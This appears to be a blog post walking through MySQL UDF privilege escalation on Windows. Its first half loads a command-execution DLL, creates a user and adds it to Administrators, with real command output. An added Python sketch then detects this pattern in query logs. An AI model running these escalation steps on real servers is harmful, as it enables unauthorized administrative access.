MySQL privilege escalation
2013-12-03 13:41
1. Create cmdshell:

    mysql> create function cmdshell returns string soname 'moonudf.dll';
    ERROR 2006 (HY000): MySQL server has gone away
    No connection. Trying to reconnect...
    Connection id:    1
    Current database: mysql

    Query OK, 0 rows affected (0.25 sec)
2. View user information:

    mysql> select cmdshell('net user');
    +-------------------------------------------------------------------------------+
    | cmdshell('net user')
    +-------------------------------------------------------------------------------+
    | \\ 的用户帐户
    -------------------------------------------------------------------------------
    Administrator ASPNET Guest HelpAssistant IUSR_PC-201202111331 IWAM_PC-201202111331 SUPPORT_388945a0
    命令运行完毕,但发生一个或多个错误。
    --------------------------------------------完成! |
    +-------------------------------------------------------------------------------+
    1 row in set (0.22 sec)
3. Add a user:

    mysql> select cmdshell('net user test w321321 /add');
    +-------------------------------------------------------------------------+
    | cmdshell('net user test w321321 /add')                                  |
    +-------------------------------------------------------------------------+
    | 命令成功完成。
    --------------------------------------------完成! |
    +-------------------------------------------------------------------------+
    1 row in set (0.36 sec)
4. Add the user to the administrators group:

    mysql> select cmdshell('net localgroup administrators test /add ');
    +-------------------------------------------------------------------------+
    | cmdshell('net localgroup administrators test /add ')                    |
    +-------------------------------------------------------------------------+
    | 命令成功完成。
    --------------------------------------------完成! |
    +-------------------------------------------------------------------------+
    1 row in set (0.22 sec)

Test result:
5. View ports:

    mysql> select cmdshell('netstat -an');
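
The sequence in steps 1 to 5 leaves a recognizable trail when the MySQL general query log is enabled. The following detection sketch is an added example, not code from the original post: it flags `CREATE FUNCTION ... SONAME` statements and later calls to the loaded function, with extra weight on arguments that add local accounts. The log lines are constructed from the statements above, and the names `scan_general_log`, `CREATE_UDF` and `ACCOUNT_CHANGE` are hypothetical.

```python
import re

# Constructed sample of MySQL general query log lines (tab-separated:
# timestamp, connection id + command, statement); not captured from a real host.
SAMPLE_LOG = """\
2013-12-03T13:35:01Z\t1 Query\tcreate function cmdshell returns string soname 'moonudf.dll'
2013-12-03T13:35:20Z\t1 Query\tselect cmdshell('net user')
2013-12-03T13:36:02Z\t1 Query\tselect cmdshell('net user test w321321 /add')
2013-12-03T13:36:40Z\t1 Query\tselect cmdshell('net localgroup administrators test /add ')
2013-12-03T13:37:05Z\t2 Query\tselect count(*) from orders
"""

# Loading a UDF from a shared library is the step that makes command execution possible.
CREATE_UDF = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(?:if\s+not\s+exists\s+)?"
    r"`?(\w+)`?\s+returns\s+\w+\s+soname\s+'([^']+)'", re.IGNORECASE)
# Arguments that create accounts or change group membership on Windows.
ACCOUNT_CHANGE = re.compile(r"net\s+(?:user|localgroup)\b.*?/add", re.IGNORECASE)

def scan_general_log(text):
    """Return (severity, timestamp, reason) findings for UDF load and use."""
    findings, udfs = [], {}
    for line in text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3 or not parts[1].strip().endswith("Query"):
            continue  # skip headers, Connect/Quit events and malformed lines
        ts, stmt = parts[0], parts[2].strip()
        m = CREATE_UDF.search(stmt)
        if m:
            udfs[m.group(1).lower()] = m.group(2)  # remember name -> library
            findings.append(("high", ts, f"UDF {m.group(1)} loaded from {m.group(2)}"))
            continue
        for name, lib in udfs.items():
            call = re.search(rf"\b{re.escape(name)}\s*\((.*)\)", stmt,
                             re.IGNORECASE | re.DOTALL)
            if not call:
                continue
            if ACCOUNT_CHANGE.search(call.group(1)):
                findings.append(("critical", ts, f"{name} ({lib}) changed local accounts"))
            else:
                findings.append(("medium", ts, f"{name} ({lib}) called"))
    return findings

if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

The same registration is visible after the fact as a row in the `mysql.func` table, which lists every loaded UDF with its library name.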